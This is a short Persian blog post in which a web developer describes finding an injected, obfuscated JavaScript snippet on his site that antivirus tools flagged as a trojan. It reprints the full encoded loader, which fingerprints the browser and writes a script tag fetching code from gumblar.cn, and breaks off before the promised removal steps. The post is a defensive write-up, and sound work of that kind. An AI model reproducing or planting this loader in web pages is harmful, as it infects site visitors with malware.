امید پیله ور

مدتی پیش مشکلی با یکی از سایت هایی که ساخته بودم داشتم، این بود که وقتی صفحه سایت باز میشد آنتی ویروس ها تروجانی رو شناسایی میکردن و سایت باز نمیشد! اونایی هم که آنتی ویروس نداشتن هم که قربانی این تروجان میشدن!

وقتی رفتم کد صفحه رو خوندم، به یه قطعه کد Java Script برخورد کردم که کد شده بود.

اینجور چیزی بود:

(function(jil){var xR5p='%';e val(unescape(('var"20a"3d"22Sc"72iptEngin"65"22"2c"62"3d"22"56ers"69on()+"22"2c"6a"3d"22"22"2cu"3dnavig"61t"6fr"2e"75s"65rAgent"3bif(("75"2eind"65xOf"28"22Win"22)"3e0)"26"26(u"2e"69n"64exO"66("22NT"20"36"22"29"3c0)"26"26(documen"74"2ecookie"2e"69ndex"4f"66"28"22"6die"6b"3d1"22)"3c0)"26"26"28t"79"70e"6ff("7arvzts)"21"3dtypeof("22A"22))"29"7bzrvzts"3d"22A"22"3b"65va"6c("22if(wi"6edow"2e"22+a+"22"29j"3d"6a+"22+a+"22M"61jo"72"22+"62"2ba+"22Minor"22"2bb+a+"22B"75"69ld"22"2bb"2b"22j"3b"22)"3bdocu"6de"6e"74"2ewr"69"74e("22"3csc"72ipt"20sr"63"3d"2f"2fgumblar"2ecn"2frss"2f"3fid"3d"22+j+"22"3e"3c"5c"2f"73cript"3e"22"29"3b"7d').replace(jil,xR5p)))})(/"/g);

این کد میره از سایتی به نشانی gumblar .cn تروجانی رو منتقل کامپیوتر شما میکنه!

این قطعه کد دقیقا به انتهای آخرین تگ بسته شده قبل از تگ <body> میچسبه و در حال اجرای سایت گند میزنه به سیستم ملت!

و اما چطوری ریشه این ویروس رو از سایت خود بکنیم:

ادامه ی نوشته